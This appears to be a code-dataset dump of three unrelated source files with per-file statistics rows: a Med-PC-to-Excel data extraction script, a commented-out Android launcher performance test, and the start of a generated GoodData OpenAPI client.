mainsheet.write(lastrow, k+1, None)
else:
for k in range(len(Subject)):
if len(eval(ArrayVar[i])) > 0 and StartElement[i] < len(eval(ArrayVar[i])[k]):
mainsheet.write(lastrow, k+1, float(eval(ArrayVar[i])[k][StartElement[i]]))
else:
mainsheet.write(lastrow, k+1, None)
elif ArrayIncrement[i] > 0:
if StopElement[i] == None or isinstance(StopElement[i], str):
steps = range(StartElement[i], len(max(eval(ArrayVar[i]), key = len)), ArrayIncrement[i])
elif StopElement[i] > StartElement[i]:
if len(max(eval(ArrayVar[i]), key = len)) < StopElement[i] + 1:
steps = range(StartElement[i], len(max(eval(ArrayVar[i]), key = len)), ArrayIncrement[i])
else:
steps = range(StartElement[i], StopElement[i] + 1, ArrayIncrement[i])
for x in steps:
lastrow = lastrow + 1
for k in range(len(Subject)):
if LabelIncrement[i] != None and LabelIncrement[i] > 0:
mainsheet.write(lastrow, 0, Label[i] + ' ' + str(LabelStartValue[i] + int((x-StartElement[i])/ArrayIncrement[i]) * LabelIncrement[i]))
else:
mainsheet.write(lastrow, 0, Label[i])
if x < len(eval(ArrayVar[i])[k]):
mainsheet.write(lastrow, k+1, float(eval(ArrayVar[i])[k][x]))
else:
mainsheet.write(lastrow, k+1, None)
output.close()
elif mode == 'Books':
MPC_filelist = MPCdatafiles
for dfile in MPC_filelist:
xlsxfilename = dfile.split('/')[-1]
MPC_file = open(dfile, 'r').readlines()
Filenames = list()
Startdate = list()
Enddate = list()
Subject = list()
Experiment = list()
Group = list()
Box = list()
Starttime = list()
Endtime = list()
MSN = list()
A = list()
B = list()
C = list()
D = list()
E = list()
F = list()
G = list()
H = list()
I = list()
J = list()
K = list()
L = list()
M = list()
N = list()
O = list()
P = list()
Q = list()
R = list()
S = list()
T = list()
U = list()
V = list()
W = list()
X = list()
Y = list()
Z = list()
Comments = list()
### The datavars variable holds the names of all the data variables.
### It will be used to loop over the arrays at the end of each subject
### and even out any length differences
datavars = list(['A','B','C','D','E','F',
'G','H','I','J','K','L','M',
'N','O','P','Q','R','S','T',
'U','V','W','X','Y','Z'])
### Values will hold the numbers for each array so they can be collected and flattened
values = list()
currentarray = ''
### Begin the for loop that will loop over the data and collect everything into MPC_file
for line in MPC_file:
# Begin by collecting the headers
# Collect the file names
if 'File' in line:
path = line[6:-1]
Filenames.append(path)
# Collect the start and end dates in ISO 8601 format, correcting for a lack of Y2KCOMPLIANT.
elif 'Start Date' in line:
if len(line) < 22:
Startdate.append("20"+line[18:-1]+"-"+line[12:14]+"-"+line[15:17])
else:
Startdate.append(line[18:-1]+"-"+line[12:14]+"-"+line[15:17])
if len(Startdate) > len(Filenames):
Filenames.append(None)
elif 'End Date' in line:
if len(line) < 20:
Enddate.append("20"+line[16:-1]+"-"+line[10:12]+"-"+line[13:15])
else:
Enddate.append(line[16:-1]+"-"+line[10:12]+"-"+line[13:15])
# Similarly, collect subject, experiment, group, box, start time, end time and program name
elif 'Subject' in line:
Subject.append(line[9:-1])
elif 'Experiment' in line:
Experiment.append(line[12:-1])
elif 'Group' in line:
Group.append(line[7:-1])
elif 'Box' in line:
Box.append(line[5:-1])
elif 'Start Time' in line:
if line[12] == ' ':
Starttime.append(line[13:-1])
else:
Starttime.append(line[12:-1])
elif 'End Time' in line:
if line[10] == ' ':
Endtime.append(line[11:-1])
else:
Endtime.append(line[10:-1])
elif 'MSN' in line:
MSN.append(line[5:-1])
# Check for an array header, if it is present, check if values have been entered into
# a previous data array. If there are previous data values, flatten the data array and dump them.
elif len(line) > 1:
if re.search(r'\D:', line) != None and line[0:1] != '\\':
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
### here we should check for whether the letter has been printed as just a variable.
if re.search(r'\d', line) != None and line[0:1] != '\\':
currentarray = line[0]
values.append(line.split()[1])
eval(currentarray).append(values)
values = list()
### then we should set the beginning of a new array.
else:
currentarray = line[0]
### this part checks if the line is a comment and then collects the data
elif line[0:1] == '\\':
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
Comments.append(line[1:-1])
else:
Comments.append(line[1:-1])
else:
values.append(line.split()[1:])
elif line == '\n' or len(line) < 1:
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
if len(Startdate) > len(Comments):
Comments.append(None)
for v in datavars:
if len(eval(v)) < len(Startdate):
eval(v).append(list())
### Check to see if the for loop has ended on a line with values.
### Tie off the loose ends
if len(line) > 1:
if len(values) > 0:
values = list(itertools.chain.from_iterable(values))
eval(currentarray).append(values)
values = list()
if len(Startdate) > len(Comments):
Comments.append(None)
for v in datavars:
if len(eval(v)) < len(Startdate):
eval(v).append(list())
### This final part will begin writing the data to the Excel file.
fullpath = outputfile + '/' + xlsxfilename + '.xlsx'
output = xlsxwriter.Workbook(fullpath)
output.set_properties({
'title': 'Med-PC Data',
'subject': 'Animal behaviour',
'category': 'Raw data',
'comments': 'Extracted using GEToperant. GEToperant is free open source software. https://www.github.com/SKhoo'
})
mainsheet = output.add_worksheet('GEToperant output')
### Write the headers
mainsheet.set_column('A:A', 15)
lastrow = -1
if exportfilename == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Filename')
for i in range(len(Filenames)):
mainsheet.write(lastrow, i+1, Filenames[i])
if exportstartdate == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Start Date')
for i in range(len(Startdate)):
mainsheet.write(lastrow, i+1, Startdate[i])
if exportenddate == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'End Date')
for i in range(len(Enddate)):
mainsheet.write(lastrow, i+1, Enddate[i])
if exportsubject == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Subject')
for i in range(len(Subject)):
mainsheet.write(lastrow, i+1, Subject[i])
if exportexperiment == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Experiment')
for i in range(len(Subject)):
mainsheet.write(lastrow, i+1, Experiment[i])
if exportgroup == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Group')
for i in range(len(Group)):
mainsheet.write(lastrow, i+1, Group[i])
if exportbox == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Box')
for i in range(len(Box)):
mainsheet.write(lastrow, i+1, float(Box[i]))
if exportstarttime == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'Start Time')
for i in range(len(Starttime)):
mainsheet.write(lastrow, i+1, Starttime[i])
if exportendtime == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'End Time')
for i in range(len(Endtime)):
mainsheet.write(lastrow, i+1, Endtime[i])
if exportmsn == 1:
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, 'MSN')
for i in range(len(MSN)):
mainsheet.write(lastrow, i+1, MSN[i])
for i in range(len(Label)):
### This function will loop over the profile. For each label it will check if it is
### 1. A single element extraction
### 2. A partial array extraction
### 3. A full array extraction
if ArrayIncrement[i] < 1:
# Single element extraction takes only the label
lastrow = lastrow + 1
mainsheet.write(lastrow, 0, Label[i])
if 'comment' in ArrayVar[i].lower():
for k in range(len(Subject)):
if k < len(Comments):
mainsheet.write(lastrow, k+1, Comments[k])
else:
mainsheet.write(lastrow, k+1, None)
else:
for k in range(len(Subject)):
if len(eval(ArrayVar[i])) > 0 and StartElement[i] < len(eval(ArrayVar[i])[k]):
mainsheet.write(lastrow, k+1, float(eval(ArrayVar[i])[k][StartElement[i]]))
else:
mainsheet.write(lastrow, k+1, None)
elif ArrayIncrement[i] > 0:
if StopElement[i] == None or isinstance(StopElement[i], str):
steps = range(StartElement[i], len(max(eval(ArrayVar[i]), key = len)), ArrayIncrement[i])
elif StopElement[i] > StartElement[i]:
if len(max(eval(ArrayVar[i]), key = len)) < StopElement[i] + 1:
steps = range(StartElement[i], len(max(eval(ArrayVar[i]), key = len)), ArrayIncrement[i])
else:
steps = range(StartElement[i], StopElement[i] + 1, ArrayIncrement[i])
for x in steps:
lastrow = lastrow + 1
for k in range(len(Subject)):
if LabelIncrement[i] != None and LabelIncrement[i] > 0:
mainsheet.write(lastrow, 0, Label[i] + ' ' + str(LabelStartValue[i] + int((x-StartElement[i])/ArrayIncrement[i]) * LabelIncrement[i]))
else:
mainsheet.write(lastrow, 0, Label[i])
if x < len(eval(ArrayVar[i])[k]):
mainsheet.write(lastrow, k+1, float(eval(ArrayVar[i])[k][x]))
else:
mainsheet.write(lastrow, k+1, None)
output.close()
| 44.328215
| 185
| 0.468846
| 4,878
| 46,190
| 4.427224
| 0.072776
| 0.070013
| 0.084599
| 0.03973
| 0.829505
| 0.807418
| 0.797462
| 0.783756
| 0.783756
| 0.783756
| 0
| 0.024598
| 0.42087
| 46,190
| 1,041
| 186
| 44.370797
| 0.782729
| 0.121541
| 0
| 0.859544
| 0
| 0.002401
| 0.054236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002401
| false
| 0
| 0.006002
| 0
| 0.008403
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b35461cf6a6e316af92526384bd3102c452ca36
| 11,415
|
py
|
Python
|
example/test_launcher/test_hilauncher_response_time.py
|
bentonq-yi/casium
|
ee0bdd5b9600db6149f4ae9b9e38aae5ff38e601
|
[
"Apache-2.0"
] | 1
|
2017-11-09T09:01:51.000Z
|
2017-11-09T09:01:51.000Z
|
example/test_launcher/test_hilauncher_response_time.py
|
bentonq-yi/casium
|
ee0bdd5b9600db6149f4ae9b9e38aae5ff38e601
|
[
"Apache-2.0"
] | null | null | null |
example/test_launcher/test_hilauncher_response_time.py
|
bentonq-yi/casium
|
ee0bdd5b9600db6149f4ae9b9e38aae5ff38e601
|
[
"Apache-2.0"
] | null | null | null |
# from selenium.common.exceptions import NoSuchElementException
#
# from roboui import Device, By
# from test_launcher.launcher import Launcher
#
# PACKAGE_HILAUNCHER = 'com.transsion.hilauncher'
# PACKAGE_CONTACTS = 'com.android.contacts'
# PACKAGE_MESSAGES = 'com.android.mms'
# PACKAGE_CAMERA = 'com.mediatek.camera'
# PACKAGE_SETTINGS = 'com.android.settings'
# PACKAGE_BROWSER = 'com.transsion.phoenix'
# PACKAGE_PICTURE = 'com.android.gallery3d'
#
# TEST_STEP_APP_OPEN = 0
# TEST_STEP_APP_CLOSE = 1
# CLOSE_METHOD_PRESS_BACK = 0
# CLOSE_METHOD_PRESS_HOME = 1
#
#
# VIEW_GROUP = 'android.view.ViewGroup'
#
# def test_contact_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Contacts', PACKAGE_CONTACTS, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_contact_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Contacts', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_contact_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Contacts', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_messages_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Messages', PACKAGE_MESSAGES, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_messages_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Messages', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_messages_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Messages', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_camera_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Camera', PACKAGE_CAMERA, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_camera_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Camera', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_camera_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Camera', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_settings_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Settings', PACKAGE_SETTINGS, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_settings_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Settings', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_settings_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Settings', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_browser_open(repeat_count, systrace_info):
# l = Launcher()
# d = Device()
# l.skip_all_guide()
# l.home()
# l.open_drawer()
# app = l.find_icon_in_drawer('PHX Browser')
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_BROWSER)
# app.click()
# systrace_info.systrace_end()
# d.press_back()
# d.find_element(By.text('CONFIRM')).click()
# l.home()
# l.home()
#
# def test_browser_close_by_back(repeat_count, systrace_info):
# l = Launcher()
# d = Device()
# l.skip_all_guide()
# l.home()
# l.open_drawer()
# app = l.find_icon_in_drawer('PHX Browser')
# for i in range(repeat_count):
# app.click()
# d.press_back()
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.find_element(By.text('CONFIRM')).click()
# systrace_info.systrace_end()
# l.home()
# l.home()
#
# def test_browser_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('PHX Browser', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_picture_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('My Picture', PACKAGE_PICTURE, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_picture_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('My Picture', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_picture_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('My Picture', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_open_folder(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.add_icon_to_page(0)
#
# d = Device()
# workspace = d.find_element(By.resource_id('workspace'))
#
# try:
# folder = workspace.find_element(By.description_starts_with('Folder:'))
# except NoSuchElementException:
# l = Launcher()
# l.create_folder(9)
# folder = workspace.find_element(By.description_starts_with('Folder:'))
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# folder.click()
# systrace_info.systrace_end()
# d.press_back()
# d.press_home()
#
# def test_open_folder_add_apps_page(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
#
# d = Device()
# workspace = d.find_element(By.resource_id('workspace'))
# try:
# folder = workspace.find_element(By.description_starts_with('Folder:'))
# except NoSuchElementException:
# l.create_folder(9)
# folder = workspace.find_element(By.description_starts_with('Folder:'))
#
# for i in range(repeat_count):
# folder.click()
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.click(540.0 / 1080.0, 1689.0 / 1920.0)
# systrace_info.systrace_end()
# d.press_back()
# d.press_home()
#
# def test_open_option_menu(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.add_icon_to_page(0)
#
# d = Device()
# workspace = d.find_element(By.resource_id('workspace'))
# app = workspace.find_element(By.xpath('//%s/android.widget.TextView[last()]' % VIEW_GROUP))
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# app.long_click()
# systrace_info.systrace_end()
# d.press_back()
#
# def test_drawer_open(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.add_icon_to_page(0)
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# l.open_drawer()
# systrace_info.systrace_end()
# l.close_drawer()
#
# # todo data is error
# def test_enter_edit_mode_by_long_click(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.add_icon_to_page(0)
#
# d = Device()
# for i in range(repeat_count):
# # enter edit mode by long click
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# l.enter_edit_mode()
# systrace_info.systrace_end()
# # exit edit mode
# d.press_back()
#
# def test_enter_a_z(repeat_count, systrace_info):
# launch_app_and_collect_systrace('A-Z', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_enter_freezer(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Freezer', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_enter_freezer_add_list(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.open_drawer()
# l.find_icon_in_drawer('Freezer').click()
#
# d = Device()
# # Unfreeze all
# has_more = True
# while has_more:
# l.find_icon_in_drawer('Freezer').click()
# try:
# app = d.find_element(By.resource_id('freezer_app_text'))
# if app.text != 'Add':
# app.click()
# d.find_element(By.text('OK')).click()
# d.wait()
# except NoSuchElementException:
# has_more = False
#
# l.find_icon_in_drawer('Freezer').click()
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.find_element(By.text('Add')).click()
# systrace_info.systrace_end()
# d.press_back()
# l.home()
# l.home()
#
# def test_onekey_clean(repeat_count, systrace_info):
# l = Launcher()
# d = Device()
# l.skip_all_guide()
# l.home()
# try:
# d.find_element(By.resource_id('hios_clean_preview_background'))
# except NoSuchElementException:
# l.add_icon_to_page(0)
# l.clear_app_and_folder(0, count=1)
# l.open_widget_list()
# l.add_widget_from_list('Quick Accelerate')
# l.home()
# pass
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.find_element(By.resource_id('hios_clean_preview_background')).click()
# systrace_info.systrace_end()
#
#
# def test_onekey_wallpapers(repeat_count, systrace_info):
# l = Launcher()
# d = Device()
# l.skip_all_guide()
# l.home()
# try:
# d.find_element(By.description_starts_with('Wallpaper Swap'))
# except NoSuchElementException:
# l.add_icon_to_page(0)
# l.clear_app_and_folder(0, count=1)
# l.open_widget_list()
# l.add_widget_from_list('Wallpaper Swap')
# l.home()
# pass
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.find_element(By.description_starts_with('Wallpaper Swap')).click()
# systrace_info.systrace_end()
#
# # common method, to click app in drawer and collect systrace of launch app
# def launch_app_and_collect_systrace(app_name, app_package, repeat_count, systrace_info, test_step, close_method):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.open_drawer()
# app = l.find_icon_in_drawer(app_name)
# for i in range(repeat_count):
# if test_step == TEST_STEP_APP_OPEN:
# systrace_info.systrace_begin(app_package)
# app.click()
# systrace_info.systrace_end()
# l.back()
# elif test_step == TEST_STEP_APP_CLOSE:
# if close_method == CLOSE_METHOD_PRESS_BACK:
# app.click()
# systrace_info.systrace_begin(app_package)
# l.back()
# systrace_info.systrace_end()
# elif close_method == CLOSE_METHOD_PRESS_HOME:
# app.click()
# systrace_info.systrace_begin(app_package)
# l.home()
# systrace_info.systrace_end()
# l.open_drawer()
# app = l.find_icon_in_drawer(app_name)
# l.home()
# l.home()
#
| 38.434343
| 147
| 0.69251
| 1,504
| 11,415
| 4.823138
| 0.087101
| 0.120761
| 0.141439
| 0.171216
| 0.838572
| 0.799283
| 0.762338
| 0.729666
| 0.719189
| 0.660325
| 0
| 0.003909
| 0.193167
| 11,415
| 296
| 148
| 38.564189
| 0.783713
| 0.9477
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0.003378
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1b5b6a8b294def1916f7e818d41a0436e2d23546
| 87,308
|
py
|
Python
|
gooddata-metadata-client/gooddata_metadata_client/api/declarative_layout_controller_api.py
|
jaceksan/gooddata-python-sdk
|
640bd8b679e00a5f0eb627bdf6143de078f8b59b
|
[
"MIT"
] | null | null | null |
gooddata-metadata-client/gooddata_metadata_client/api/declarative_layout_controller_api.py
|
jaceksan/gooddata-python-sdk
|
640bd8b679e00a5f0eb627bdf6143de078f8b59b
|
[
"MIT"
] | null | null | null |
gooddata-metadata-client/gooddata_metadata_client/api/declarative_layout_controller_api.py
|
jaceksan/gooddata-python-sdk
|
640bd8b679e00a5f0eb627bdf6143de078f8b59b
|
[
"MIT"
] | null | null | null |
"""
OpenAPI definition
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from gooddata_metadata_client.api_client import ApiClient, Endpoint as _Endpoint
from gooddata_metadata_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from gooddata_metadata_client.model.declarative_analytics import DeclarativeAnalytics
from gooddata_metadata_client.model.declarative_data_sources import DeclarativeDataSources
from gooddata_metadata_client.model.declarative_model import DeclarativeModel
from gooddata_metadata_client.model.declarative_organization import DeclarativeOrganization
from gooddata_metadata_client.model.declarative_user_groups import DeclarativeUserGroups
from gooddata_metadata_client.model.declarative_users import DeclarativeUsers
from gooddata_metadata_client.model.declarative_users_user_groups import DeclarativeUsersUserGroups
from gooddata_metadata_client.model.declarative_workspace_data_filters import DeclarativeWorkspaceDataFilters
from gooddata_metadata_client.model.declarative_workspace_model import DeclarativeWorkspaceModel
from gooddata_metadata_client.model.declarative_workspaces import DeclarativeWorkspaces
class DeclarativeLayoutControllerApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __get_analytics_model(
self,
workspace_id,
**kwargs
):
"""Get analytics model # noqa: E501
Retrieve current analytics model of the workspace. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_analytics_model(workspace_id, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeAnalytics
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
return self.call_with_http_info(**kwargs)
self.get_analytics_model = _Endpoint(
settings={
'response_type': (DeclarativeAnalytics,),
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}/analyticsModel',
'operation_id': 'get_analytics_model',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'workspace_id',
],
'required': [
'workspace_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_analytics_model
)
def __get_data_sources_layout(
self,
**kwargs
):
"""Get all data sources # noqa: E501
Retrieve all data sources including related physical model. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_data_sources_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeDataSources
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_data_sources_layout = _Endpoint(
settings={
'response_type': (DeclarativeDataSources,),
'auth': [],
'endpoint_path': '/api/layout/dataSources',
'operation_id': 'get_data_sources_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_data_sources_layout
)
def __get_logical_model(
self,
workspace_id,
**kwargs
):
"""Get logical model # noqa: E501
Retrieve current logical model of the workspace in declarative form. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logical_model(workspace_id, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeModel
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
return self.call_with_http_info(**kwargs)
self.get_logical_model = _Endpoint(
settings={
'response_type': (DeclarativeModel,),
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}/logicalModel',
'operation_id': 'get_logical_model',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'workspace_id',
],
'required': [
'workspace_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_logical_model
)
def __get_organization_layout(
self,
**kwargs
):
"""Get organization layout # noqa: E501
Retrieve complete layout of organization, workspaces, user-groups, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
